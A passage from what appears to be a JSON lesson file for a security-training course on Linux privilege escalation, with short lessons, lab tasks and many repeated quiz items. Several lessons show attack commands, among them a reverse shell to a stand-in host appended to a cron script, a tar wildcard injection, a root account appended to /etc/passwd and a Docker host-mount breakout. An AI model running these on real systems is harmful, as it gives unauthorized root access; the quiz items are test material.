modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-cron","cat":"Privilege Escalation","title":"Linux Cron Jobs","diff":2,"xp":150,"intro":"Exploit writable cron scripts.","sections":[{"type":"text","content":"Exploit writable cron scripts."},{"type":"code","lang":"bash","content":"cat /etc/crontab\necho 'bash -i >& /dev/tcp/ATK/4444 0>&1' >> /path/to/cron.sh"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"System cron location?","opts":["~/.bashrc","/etc/crontab","/etc/passwd","/var/log/"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-kernel","cat":"Privilege Escalation","title":"Linux Kernel Exploits","diff":3,"xp":250,"intro":"Exploit kernel vulns.","sections":[{"type":"text","content":"Exploit kernel vulns."},{"type":"code","lang":"bash","content":"uname -r\nsearchsploit linux kernel <ver> privilege"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Kernel version command?","opts":["cat /etc/os-release","uname -r","lsb_release","hostnamectl"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-path","cat":"Privilege Escalation","title":"Linux PATH Hijacking","diff":2,"xp":150,"intro":"Hijack PATH for malicious binaries.","sections":[{"type":"text","content":"Hijack PATH for malicious binaries."},{"type":"code","lang":"bash","content":"echo '/bin/bash -p' > /tmp/service\nchmod +x /tmp/service\nexport PATH=/tmp:$PATH"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Exploited variable?","opts":["HOME","PATH","LD_LIBRARY_PATH","SHELL"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-cap","cat":"Privilege Escalation","title":"Linux Capabilities","diff":2,"xp":150,"intro":"Exploit capabilities.","sections":[{"type":"text","content":"Exploit capabilities."},{"type":"code","lang":"bash","content":"getcap -r / 2>/dev/null\npython3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"UID-setting capability?","opts":["cap_net_admin","cap_setuid","cap_sys_admin","cap_dac_override"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-nfs","cat":"Privilege Escalation","title":"Linux NFS no_root_squash","diff":2,"xp":150,"intro":"SUID via NFS misconfig.","sections":[{"type":"text","content":"SUID via NFS misconfig."},{"type":"code","lang":"bash","content":"sudo mount -t nfs target:/share /mnt\ncp /bin/bash /mnt/bash\nsudo chmod +s /mnt/bash"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Root NFS option?","opts":["rw","no_root_squash","sync","all_squash"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-docker","cat":"Privilege Escalation","title":"Docker Breakout","diff":2,"xp":175,"intro":"Escape Docker or abuse group.","sections":[{"type":"text","content":"Escape Docker or abuse group."},{"type":"code","lang":"bash","content":"docker run -v /:/mnt -it alpine chroot /mnt bash"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Docker group equals?","opts":["Normal user","Root access","Read-only","Network admin"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-wildcard","cat":"Privilege Escalation","title":"Wildcard Injection","diff":2,"xp":150,"intro":"Exploit * expansion in scripts.","sections":[{"type":"text","content":"Exploit * expansion in scripts."},{"type":"code","lang":"bash","content":"echo '' > '--checkpoint=1'\necho '' > '--checkpoint-action=exec=sh rev.sh'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Exploited shell feature?","opts":["Piping","Glob expansion of * as flags","Redirect","Subshells"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-writable","cat":"Privilege Escalation","title":"Writable System Files","diff":1,"xp":100,"intro":"Exploit writable /etc/passwd.","sections":[{"type":"text","content":"Exploit writable /etc/passwd."},{"type":"code","lang":"bash","content":"openssl passwd -1 newpass\necho 'hacker:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Writable file for instant root?","opts":["/etc/hostname","/etc/passwd","/etc/hosts","/etc/resolv.conf"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root 